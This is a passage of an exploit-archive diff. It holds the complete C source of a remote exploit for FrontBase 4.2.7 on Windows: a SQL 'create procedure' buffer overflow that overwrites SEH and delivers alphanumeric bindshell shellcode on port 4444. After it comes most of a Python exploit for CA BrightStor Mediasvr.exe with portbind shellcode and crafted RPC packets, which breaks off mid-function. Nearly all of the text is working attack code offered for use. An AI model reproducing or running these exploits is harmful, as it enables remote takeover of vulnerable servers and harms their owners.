Found by : Netragard, L.L.C Advisory +* ---------------------------------------- +* Exploit date : 25.03.2007 +* Exploit writer : Heretic2 (heretic2x@gmail.com) +* OS : Windows 2000 SP4 (will add other later) +* Crew : Dreatica-FXP +* ---------------------------------------- +* Info: +* The last Windows version of Frontbase that you can found on official site www.frontbase.com +* is the 4.2.7d and this version is patched, so the exploit will not work here, i have tested that +* exploit on the 4.2.7 version under Windows 2000 SP4 (not patched) and it is working good. +* +* The exploitation, as said in advisory, of this bug is easy: SEH and EIP overwrite methods. +* but in 'real' life the exploitation is more difficult, cause the server allows only alphanumeric +* bytes, like: 0x01 0x02 ... 0x7e 0x7f . +* other bytes: 0x80 ... 0xff come to server transformed: +* 0xEB will transform in two bytes 0xC2 0xAB +* 0xFF will transform in two bytes 0xC3 0xBF +* and etc... +* +* so the exploitation become more difficult here, however in one place of buffer i send to the server byte +* 0xff, with assumptions that i will get the bytes 0xC3 0xBF and that the buffer will be one byte longer. +* +* for the correct exploitation i used some code from win32 SEH GetPC project and metasploit for the shellcodes. +* +* so the exploit is: +* send 3115 bytes to server + address to overwrite SEH. +* in my case i sent 3114 bytes, cause one 0xff transformed in 2 symbols +* +* ---------------------------------------- +* Compiling: +* To compile this exploit you need: +* 1. C:\usr\FrontBase\Include\FBCAccess copy to exploit folder. +* 2. Copy from C:\usr\FrontBase\lib\ file FBCAccess.lib to your exploit folder. +* 3. Select FBCAccess.lib in linker options +* 4. Compile. +* ---------------------------------------- +* Thanks to: +* Netragard, L.L.C Advisory ( http://www.netragard.com -- "We make I.T. Safe." 
) +* The Metasploit project ( http://metasploit.com ) +* win32 SEH GetPC project ( ) +* Dreatica-FXP crew ( ) +* ---------------------------------------- +* +*/ + +#include +#include +#include +#include +#pragma comment(lib,"ws2_32") +#include "FBCAccess/FBCAccess.h" + +void usage(char * s); +void logo(); +void prepare_shellcode(unsigned char * fsh, int sh); +void make_buffer(char * buf, int itarget, int sh); +int validate_args( int port, int sh, int itarget); +int send_buffer(char * host, int port, char * user, char * password, char * dbpassword, char * database, char * buf); + +// ----------------------------------------------------------------- +// XGetopt.cpp Version 1.2 +// ----------------------------------------------------------------- +int getopt(int argc, char *argv[], char *optstring); +char *optarg; // global argument pointer +int optind = 0, opterr; // global argv index +// ----------------------------------------------------------------- +// ----------------------------------------------------------------- + +struct { + const char *t ; + unsigned long ret ; +} targets[]= + { + // we need alphanumeric addreses so this one found in MSVCRT.dll (there are a lot in it) + {"Windows 2000 SP4 no patches, MSVCRT.dll", 0x78014c40 },//pop, pop, ret + {"Windows 2000 SP4 no pathces, MSVCRT.dll", 0x7803382b },//jmp ebx + {NULL, 0x00000000 } + }; + +struct { + const char * name; + char * shellcode; +}shellcodes[]={ + {"Spawn bindshell on port 4444", + /* modified win32_bind - EXITFUNC=seh LPORT=4444 Encoder=Alpha2 http://metasploit.com + first jmp instructions replaced by alphanumeric code taken from the win32 SEH GetPC project. 
*/ + "\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48\x50\x68" + "\x59\x41\x41\x51\x68\x5A\x59\x59\x59\x59\x41\x41\x51\x51\x44\x44" + "\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58\x56\x6A\x30\x50\x50\x54" + "\x55\x50\x50\x61\x33\x30\x31\x30\x38\x39\x49\x49\x49\x49\x49\x49" + "\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x66" + "\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41\x76\x32\x42\x42\x32\x41" + "\x41\x30\x41\x41\x42\x58\x50\x38\x42\x42\x75\x38\x69\x39\x6c\x52" + "\x4a\x5a\x4b\x42\x6d\x68\x68\x48\x79\x4b\x4f\x6b\x4f\x4b\x4f\x65" + "\x30\x6c\x4b\x30\x6c\x31\x34\x71\x34\x4e\x6b\x42\x65\x65\x6c\x6e" + "\x6b\x53\x4c\x43\x35\x62\x58\x55\x51\x4a\x4f\x4e\x6b\x72\x6f\x54" + "\x58\x6c\x4b\x51\x4f\x77\x50\x53\x31\x78\x6b\x43\x79\x4e\x6b\x54" + "\x74\x6c\x4b\x35\x51\x6a\x4e\x64\x71\x6f\x30\x6e\x79\x6e\x4c\x6d" + "\x54\x6f\x30\x64\x34\x55\x57\x4f\x31\x59\x5a\x36\x6d\x36\x61\x59" + "\x52\x5a\x4b\x4c\x34\x37\x4b\x62\x74\x47\x54\x46\x48\x70\x75\x4d" + "\x35\x6c\x4b\x73\x6f\x64\x64\x33\x31\x4a\x4b\x43\x56\x4c\x4b\x44" + "\x4c\x62\x6b\x6e\x6b\x63\x6f\x57\x6c\x65\x51\x6a\x4b\x77\x73\x56" + "\x4c\x6c\x4b\x6e\x69\x62\x4c\x44\x64\x45\x4c\x55\x31\x6f\x33\x44" + "\x71\x6b\x6b\x51\x74\x4e\x6b\x53\x73\x30\x30\x4e\x6b\x57\x30\x34" + "\x4c\x6c\x4b\x64\x30\x37\x6c\x4e\x4d\x6c\x4b\x53\x70\x73\x38\x73" + "\x6e\x30\x68\x4c\x4e\x62\x6e\x74\x4e\x38\x6c\x30\x50\x79\x6f\x6a" + "\x76\x51\x76\x30\x53\x42\x46\x72\x48\x35\x63\x45\x62\x33\x58\x64" + "\x37\x64\x33\x74\x72\x43\x6f\x33\x64\x4b\x4f\x78\x50\x52\x48\x38" + "\x4b\x7a\x4d\x4b\x4c\x57\x4b\x62\x70\x69\x6f\x6e\x36\x71\x4f\x6e" + "\x69\x4b\x55\x33\x56\x6c\x41\x4a\x4d\x76\x68\x74\x42\x63\x65\x51" + "\x7a\x77\x72\x4b\x4f\x4a\x70\x63\x58\x6e\x39\x35\x59\x6b\x45\x4e" + "\x4d\x30\x57\x4b\x4f\x38\x56\x50\x53\x50\x53\x42\x73\x51\x43\x70" + "\x53\x70\x43\x32\x73\x52\x63\x76\x33\x59\x6f\x6e\x30\x55\x36\x33" + "\x58\x76\x71\x71\x4c\x63\x56\x56\x33\x6e\x69\x59\x71\x4e\x75\x55" + 
"\x38\x4c\x64\x55\x4a\x72\x50\x6b\x77\x56\x37\x4b\x4f\x4e\x36\x53" + "\x5a\x56\x70\x32\x71\x33\x65\x69\x6f\x4e\x30\x62\x48\x39\x34\x4c" + "\x6d\x74\x6e\x4a\x49\x63\x67\x69\x6f\x79\x46\x43\x63\x36\x35\x6b" + "\x4f\x68\x50\x35\x38\x5a\x45\x70\x49\x6d\x56\x70\x49\x41\x47\x6b" + "\x4f\x68\x56\x56\x30\x41\x44\x33\x64\x71\x45\x69\x6f\x4e\x30\x4d" + "\x43\x53\x58\x5a\x47\x70\x79\x6b\x76\x73\x49\x41\x47\x49\x6f\x4e" + "\x36\x63\x65\x4b\x4f\x4e\x30\x53\x56\x50\x6a\x35\x34\x53\x56\x41" + "\x78\x61\x73\x30\x6d\x4c\x49\x4b\x55\x72\x4a\x72\x70\x76\x39\x45" + "\x79\x58\x4c\x6b\x39\x59\x77\x31\x7a\x67\x34\x4c\x49\x49\x72\x70" + "\x31\x6f\x30\x6c\x33\x6f\x5a\x69\x6e\x72\x62\x36\x4d\x4b\x4e\x53" + "\x72\x34\x6c\x6a\x33\x6e\x6d\x62\x5a\x36\x58\x6c\x6b\x4c\x6b\x4e" + "\x4b\x61\x78\x30\x72\x6b\x4e\x6d\x63\x46\x76\x4b\x4f\x44\x35\x32" + "\x64\x39\x6f\x38\x56\x51\x4b\x70\x57\x52\x72\x70\x51\x32\x71\x53" + "\x61\x42\x4a\x43\x31\x56\x31\x46\x31\x70\x55\x43\x61\x79\x6f\x6a" + "\x70\x62\x48\x6e\x4d\x59\x49\x67\x75\x7a\x6e\x33\x63\x39\x6f\x59" + "\x46\x63\x5a\x59\x6f\x4b\x4f\x76\x57\x6b\x4f\x6a\x70\x4c\x4b\x61" + "\x47\x59\x6c\x6b\x33\x38\x44\x43\x54\x49\x6f\x58\x56\x36\x32\x59" + "\x6f\x4e\x30\x43\x58\x68\x70\x4f\x7a\x54\x44\x73\x6f\x71\x43\x4b" + "\x4f\x4e\x36\x6b\x4f\x78\x50\x66" + }, + {NULL , NULL } +}; + +// alphanumeric long back jump, using SEH method! 
+char jmptoshellcode[]= + // at the time of jump we have in EBX the address where we jumped after SEH exploitation + // so we can use it to jump [EBX-0C20] + "\x56\x54\x58\x36\x33\x30\x56\x58\x50\x50\x5f\x53\x58\x66\x2d\x20" + "\x0C\x50\x59\x58\x64\x33\x3f\x64\x31\x38\x51\x57\x64\x31\x20\x6c"; + + +int main(int argc, char **argv) +{ + char temp1[100], temp2[100]; + char * remotehost=NULL, * user=NULL, * password=NULL, * database=NULL, * dbpassword=NULL; + char default_remotehost[]="127.0.0.1"; + char default_user[]="_SYSTEM"; + char default_password[]=""; + char default_database[]=""; + char default_dbpassword[]=""; + int port, itarget, sh; + char c; + logo(); + if(argc<2) + { + usage(argv[0]); + return -1; + } + // set defaults + port=-1; + itarget=0; + sh=0; + // ------------ + while((c = getopt(argc, argv, "h:p:s:t:u:P:d:D:"))!= EOF) + { + switch (c) + { + case 'h': + remotehost=optarg; + break; + case 's': + sscanf(optarg, "%d", &sh); + sh--; + break; + case 't': + sscanf(optarg, "%d", &itarget); + itarget--; + break; + case 'p': + sscanf(optarg, "%d", &port); + break; + case 'u': + user=optarg; + break; + case 'P': + password=optarg; + break; + case 'd': + database=optarg; + break; + default: + usage(argv[0]); + return -1; + } + } + if(validate_args( port, sh, itarget)==-1) return -1; + if(remotehost == NULL) remotehost=default_remotehost; + if(user == NULL) user=default_user; + if(password == NULL) password=default_password; + if(dbpassword == NULL) dbpassword=default_dbpassword; + if(database == NULL) database=default_database; + + memset(temp1,0,sizeof(temp1)); + memset(temp2,0,sizeof(temp2)); + memset(temp1, '\x20' , 58 - strlen(remotehost) -1); + printf(" # Host : %s%s# \n", remotehost, temp1); + if(port!=-1) + { + sprintf(temp2, "%d", port); + memset(temp1,0,sizeof(temp1)); + memset(temp1, '\x20' , 58 - strlen(temp2) -1); + printf(" # Port : %s%s# \n", temp2, temp1); + }else + { + sprintf(temp2, "%s", database); + memset(temp1,0,sizeof(temp1)); + 
memset(temp1, '\x20' , 58 - strlen(temp2) -1); + printf(" # Database: %s%s# \n", temp2, temp1); + } + sprintf(temp2, "%s", user); + memset(temp1,0,sizeof(temp1)); + memset(temp1, '\x20' , 58 - strlen(temp2) -1); + printf(" # User : %s%s# \n", temp2, temp1); + sprintf(temp2, "%s", database); + memset(temp1,0,sizeof(temp1)); + memset(temp1, '\x20' , 58 - strlen(temp2) -1); + printf(" # Database: %s%s# \n", temp2, temp1); + memset(temp1,0,sizeof(temp1)); + memset(temp2,0,sizeof(temp2)); + sprintf(temp2, "%s", shellcodes[sh].name ); + memset(temp1, '\x20' , 58 - strlen(temp2) -1); + printf(" # Shellcde: %s%s# \n", temp2, temp1); + memset(temp1,0,sizeof(temp1)); + memset(temp1, '\x20' , 58 - strlen(targets[itarget].t) -1); + printf(" # Target : %s%s# \n", targets[itarget].t, temp1); + printf(" # ------------------------------------------------------------------- # \n"); + fflush(stdout); + + char buf[20000]; + memset(buf,0,sizeof(buf)); + printf("[+] Constructing attacking buffer... "); + fflush(stdout); + make_buffer((char *)buf,itarget,sh); + printf("done\n"); + + if(send_buffer(remotehost,port, user, password, dbpassword, database, buf)==-1) + { + fprintf(stdout, "[-] Cannot exploit server %s\n", remotehost); + return -1; + } + return 0; +} + +int validate_args(int port, int sh, int itarget) +{ + int i=0,x=0; + for(i=0;shellcodes[i].name;i++)if(i==sh)x=1; + if(x==0) + { + printf("[-] The shellcode number is invalid\n"); + return -1; + } + x=0; + for(i=0;targets[i].t;i++)if(i==itarget)x=1; + if(x==0) + { + printf("[-] The target is invalid\n"); + return -1; + } + return 1; +} + +void prepare_shellcode( char * fsh, int sh) +{ + memcpy(fsh, shellcodes[sh].shellcode, strlen(shellcodes[sh].shellcode)); +} + +void make_buffer(char * buf, int itarget, int sh) +{ + // -=[ prepare shellcode ]=- + char * fsh; + fsh = (char *) malloc ((strlen(shellcodes[sh].shellcode)+1) ); + memset(fsh, 0, (strlen(shellcodes[sh].shellcode)+1)); + prepare_shellcode(fsh, sh); + // 
----------------- + + // -=[ fill buffer here ]=- + memset(buf,0,sizeof(buf)); + char * cp = buf; + + // make vulnerable sql92 command to get exploit + strcat(buf, "create procedure \""); + cp=buf+strlen(buf); + + // some useless bytes + memset(cp, 'A', 7); + cp+=strlen((char *)cp); + + // shellcode + memcpy(cp, fsh, strlen(fsh)); + cp+=strlen((char *)cp); + + // fill after shellcode + memset(cp, 'A', 3045-strlen(fsh)); + cp+=strlen((char *)cp); + + // alphanumeric long jump to our shellcode at the start of the buffer + memcpy(cp, jmptoshellcode, strlen(jmptoshellcode)); + cp+=strlen((char *)cp); + memset(cp, 'A', 59-strlen(jmptoshellcode)); + cp+=strlen((char *)cp); + + // at this place in stack points EBX and RET will go here, so we need to jmp upper + // to prepare alphanumeric long jump + + *cp++ = '\x74'; // JNE ... at this point JNE will jump cause the last CMP was 'not equal' + *cp++ = '\xff'; // this is not alphanumeric , but the server will transform \xff -> \xC3\xBF + // so this will give us the JNE C3 and we will jump upper for 59 bytes + // where we put a longer jump to our shellcode. This will add one byte more + // so we will send not 3115, but 3114 bytes to overwrite SEH. 
+ *cp++ = '\x41'; + + // SEH chain overwrite + *cp++ = (char)((targets[itarget].ret ) & 0xff); + *cp++ = (char)((targets[itarget].ret >> 8) & 0xff); + *cp++ = (char)((targets[itarget].ret >> 16) & 0xff); + *cp++ = (char)((targets[itarget].ret >> 24) & 0xff); + + // end of the sql92 command + memcpy(cp, "\"()\n begin\n end;", strlen("\"()\n begin\n end;")); + + // ----------------- +} + +int send_buffer(char * host, int port, char * user, char * password, char * dbpassword, char * database, char * buf) +{ + FBCDatabaseConnection * fbdc; + FBCMetaData *meta; + char sesn[]="dreatica-fxp"; + if(database!=NULL) port = -1; + fbcInitialize(); + if (port!=-1) + { + printf("[+] Connecting to %s:%d\n", host, port); + fbdc = fbcdcConnectToDatabaseUsingPort(host, port, dbpassword); + }else + { + printf("[+] Connecting to %s to database %s\n", host, database); + fbdc = fbcdcConnectToDatabase(database, host, dbpassword); + } + if (fbdc == NULL) + { + printf("[-] Cannot connect to %s\n", host); + return -1; + } + char * session_name=sesn; + meta = fbcdcCreateSession(fbdc, session_name, user, password, "system_user"); + if (fbcmdErrorsFound(meta) != 0) + { + printf("[-] Failed to create session\n"); + FBCErrorMetaData* emd = fbcdcErrorMetaData(fbdc, meta); + char* msgs = fbcemdAllErrorMessages(emd); + fbcemdRelease(emd); + free(msgs); + fbcmdRelease(meta); + fbcdcClose(fbdc); + fbcdcRelease(fbdc); + return -1; + } + fbcmdRelease(meta); + printf("[+] Sending %d bytes of buffer to server, check the shell\n", strlen(buf)); + // if exploit success, the app will stop here. 
+ meta = fbcdcExecuteDirectSQL(fbdc, buf); + if (fbcmdErrorsFound(meta) != 0) + { + printf("[-] Failed to send buffer\n"); + FBCErrorMetaData* emd = fbcdcErrorMetaData(fbdc, meta); + char* msgs = fbcemdAllErrorMessages(emd); + fbcemdRelease(emd); + free(msgs); + fbcmdRelease(meta); + fbcdcClose(fbdc); + fbcdcRelease(fbdc); + return -1; + } + fbcmdRelease(meta); + return 1; +} + + +// ----------------------------------------------------------------- +// XGetopt.cpp Version 1.2 +// ----------------------------------------------------------------- +int getopt(int argc, char *argv[], char *optstring) +{ + static char *next = NULL; + if (optind == 0) + next = NULL; + + optarg = NULL; + + if (next == NULL || *next == '\0') + { + if (optind == 0) + optind++; + + if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0') + { + optarg = NULL; + if (optind < argc) + optarg = argv[optind]; + return EOF; + } + + if (strcmp(argv[optind], "--") == 0) + { + optind++; + optarg = NULL; + if (optind < argc) + optarg = argv[optind]; + return EOF; + } + + next = argv[optind]; + next++; // skip past - + optind++; + } + + char c = *next++; + char *cp = strchr(optstring, c); + + if (cp == NULL || c == ':') + return '?'; + + cp++; + if (*cp == ':') + { + if (*next != '\0') + { + optarg = next; + next = NULL; + } + else if (optind < argc) + { + optarg = argv[optind]; + optind++; + } + else + { + return '?'; + } + } + + return c; +} +// ----------------------------------------------------------------- +// ----------------------------------------------------------------- +// ----------------------------------------------------------------- + + + + + +void usage(char * s) +{ + printf(" Usage:\n"); + printf(" %s -h -p -s -t -u -p -d -D \n", s); + printf(" ----------------------------------------------------------------------- \n"); + printf(" Arguments:\n"); + printf("\n"); + printf(" -h the host IP to attack\n"); + printf(" -p the port of server (default: -1 )\n"); + printf(" -s 
shellcode number (default: 0 )\n");
+ printf(" -t target number (default: 0 )\n");
+ printf(" -t target number (default: 0 )\n");
+ printf(" -u user name of frontbase (default: _SYSTEM)\n");
+ printf(" -p user password (default: )\n");
+ printf(" -d database (if port = -1) (default: )\n");
+ printf(" -d database password (default: )\n");
+ printf("\n");
+ printf(" Shellcodes:\n");
+ for(int i=0; shellcodes[i].name!=0;i++)
+ {
+ printf(" %d. %s Size=%d\n",i+1,shellcodes[i].name, strlen(shellcodes[i].shellcode));
+ }
+ printf("\n");
+ printf(" Targets:\n");
+ for(int j=0; targets[j].t!=0;j++)
+ {
+ printf(" %d. %s\n",j+1,targets[j].t);
+ }
+ printf("\n");
+ printf(" Examples:\n");
+ printf(" %s -h 127.0.0.1 -d NewDB\n", s);
+ printf(" %s -h 127.0.0.1 -p 1155 -u root -p dta -D dta -t 1\n", s);
+ printf(" ----------------------------------------------------------------------- \n");
+
+
+}
+
+void logo()
+{
+ printf(" ####################################################################### \n");
+ printf(" # ____ __ _ ______ __ _____ #\n");
+ printf(" # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n");
+ printf(" # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n");
+ printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n");
+ printf(" # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n");
+ printf(" # crew #\n");
+ printf(" ####################################################################### \n");
+ printf(" # Exploit : Frontbase <= 4.2.7 for Windows # \n");
+ printf(" # Author : Heretic2 (heretic2x@gmail.com) # \n");
+ printf(" # Version : 1.1 # \n");
+ printf(" # System : Windows 2000 SP4 # \n");
+ printf(" # Date : 25.03.2007 # \n");
+ printf(" # ------------------------------------------------------------------- # \n");
+}
+
+// milw0rm.com [2007-03-25]
diff --git a/platforms/windows/remote/36.c b/platforms/windows/remote/36.c
index b5d3ceb79..8bc0996b6 100755
--- a/platforms/windows/remote/36.c
+++ b/platforms/windows/remote/36.c
@@ -302,6 +302,6 @@ shellcode[i-prologuelen];
 WSACleanup();
 return (0);
 }
-
-
-// milw0rm.com [2003-06-01]
+
+
+// milw0rm.com [2003-06-01]
diff --git a/platforms/windows/remote/3604.py b/platforms/windows/remote/3604.py
index 027454509..6d995b482 100755
--- a/platforms/windows/remote/3604.py
+++ b/platforms/windows/remote/3604.py
@@ -1,228 +1,228 @@ -#!/usr/bin/python -# -# Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Code Exploit -# (Previously Unknown) -# -# There seems to be an design error in the handling of RPC data with xdr procedures -# across several .dll's imported by Mediasvr.exe. Four bytes from an RPC packet are -# processed as a particular address (xdr_handle_t data which is run through multiple bit -# shifts, and reversing of bytes), and eventually loaded into ECX. -# -# The 191 (0xbf) procedure, followed by nulls (at least 8 bytes of nulls, which may -# be Null Credentials and Auth?) leads to an exploitable condition. -# -# .text:0040AACD 008 mov ecx, [esp+8] -# .text:0040AAD1 008 mov dword_418820, esi -# .text:0040AAD7 008 push offset dword_418820 -# .text:0040AADC 00C mov eax, [ecx] -# .text:0040AADE 00C call dword ptr [eax+2Ch] -# -# At this point, you have control of ECX (esp+8 is your address data). The data from the packet -# is stored in memory and is relatively static (see NOTE). -# -# The address is then loaded into EAX, and then called as EAX+2Ch, which is -# controllable data from the packet. In this code, I just jump ahead to -# the portbinding shellcode. -# -# NOTE: The only issue I have found is when the system is rebooted, the packet data -# appears at a higher memory location when Mediasvr.exe crashes -# and is restarted. I have accounted for this in the code, when the port that -# Mediasvr.exe is listening on is below TCP port 1100, which is usually only after -# a reboot -# -# This was tested on BrightStor ARCserve Backup 11.5.2.0 (SP2) with the latest -# CA patches on Windows XP SP2 (I believe there is some issue with SP1, which -# is more then likely the memory locations) -# -# The patches include the following updates to Mediasvr.exe -# http://supportconnectw.ca.com/public/storage/infodocs/babimpsec-notice.asp -# -# CA has been notified -# -# Author: M. 
Shirk -# Tester: Tebodell -# -# (c) Copyright 2007 (Shirkdog Security) shirkdog_list $ at % hotmail dot com -# -# Use at your own Risk: You have been warned -#------------------------------------------------------------------------ - -import os -import sys -import time -import socket -import struct - -#------------------------------------------------------------------------ - -#Portbind shellcode; Binds shell on TCP port 4444 -shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" -shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58" -shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57" -shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38" -shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58" -shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" -shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" -shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48" -shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54" -shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58" -shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d" -shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38" -shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56" -shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36" -shellcode += 
"\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57" -shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" -shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e" -shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30" -shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35" -shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34" -shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41" -shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a" -shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" -shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" -shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d" -shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d" -shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56" -shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45" -shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46" -shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c" -shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c" -shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32" -shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36" -shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f" -shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36" -shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56" -shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56" -shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" -shellcode += 
"\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" -shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d" -shellcode += "\x4f\x4f\x42\x4d\x5a\x90" - -#------------------------------------------------------------------------ - -#First Packet -rpc_packet1="\x80\x00\x80\x34\x65\xcf\x4c\x7b\x00\x00\x00\x00\x00\x00\x00" -rpc_packet1+="\x02\x00\x06\x09\x7e\x00\x00\x00\x01" - -#Prodcedure 191 and nulls -rpc_packet1+="\x00\x00\x00\xbf\x00\x00\x00\x00\x00\x00\x00\x00" - -#Apparently these 4 bytes can be anything -rpc_packet1+="\x00\x00\x00\x00" - -#This value is important for the location of the next address -rpc_packet1+="\x00\x00\x00\x00" - -#Hardcoded Address loaded into ECX -rpc_packet1+="\x00\xae\x27\x64" - -#Just spacing -rpc_packet1+="\x41\x42\x43\x44" - -#Addess in memory, loaded into EAX and called with EAX+2Ch to get to shellcode -rpc_packet1+="\x3c\x27\xae\x00" - -#jump to shellcode for packet 1 -rpc_packet1+="\x6c\x27\xae\x00" -rpc_packet1+="\xeb\x01" -rpc_packet1+=shellcode - -#------------------------------------------------------------------------ - -#Second Packet -rpc_packet2="\x80\x00\x80\x34\x65\xcf\x4c\x7b\x00\x00\x00\x00\x00\x00\x00" -rpc_packet2+="\x02\x00\x06\x09\x7e\x00\x00\x00\x01" - -#Procedure 191 and nulls -rpc_packet2+="\x00\x00\x00\xbf\x00\x00\x00\x00\x00\x00\x00\x00" - -#Apparently these 4 bytes can be anything -rpc_packet2+="\x00\x00\x00\x00" - -#This value is important for the location of the next address -rpc_packet2+="\x00\x00\x00\x00" - -#Hardcoded Address loaded into ECX that seems to be hit after Mediasvr.exe has been -#restarted -rpc_packet2+="\x00\x9e\x27\x64" - -#Just spacing -rpc_packet2+="\x41\x42\x43\x44" - -#Addess stored in memory, loaded into EAX and called with EAX+2Ch to get to shellcode -rpc_packet2+="\x3c\x27\x9e\x00" - -#jump to shellcode for packet 2 -rpc_packet2+="\x6c\x27\x9e\x00" -rpc_packet2+="\xeb\x01" -rpc_packet2+=shellcode - -# Portmap request for Mediasvr.exe 
-rpc_portmap_req="\x80\x00\x00\x38\x21\x84\xf7\xc9\x00\x00\x00\x00\x00\x00\x00" -rpc_portmap_req+="\x02\x00\x01\x86\xa0\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00" -rpc_portmap_req+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -rpc_portmap_req+="\x06\x09\x7e\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x00" - -#------------------------------------------------------------------------ - -def GetMediaSvrPort(target): - sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) - sock.connect((target,111)) - sock.send(rpc_portmap_req) - rec = sock.recv(256) - sock.close() - - port1 = rec[-4] - port2 = rec[-3] - port3 = rec[-2] - port4 = rec[-1] - - port1 = hex(ord(port1)) - port2 = hex(ord(port2)) - port3 = hex(ord(port3)) - port4 = hex(ord(port4)) - port = '%02x%02x%02x%02x' % (int(port1,16),int(port2,16),int(port3,16),int(port4,16)) - - port = int(port,16) - if port < 1100: - print '[+] Fresh Meat: Mediasvr.exe has not been restarted, Sending Packet 1 to: Target: %s Port: %s' %(target,port) - ExploitMediaSvr(target,port,1) - else: - print '[+] Mediasvr.exe has been restarted, Sending Packet 2 to: Target: %s Port: %s' % (target,port) - ExploitMediaSvr(target,port,2) - -def ExploitMediaSvr(target,port,p): - sock = socket.socket(socket.AF_INET, 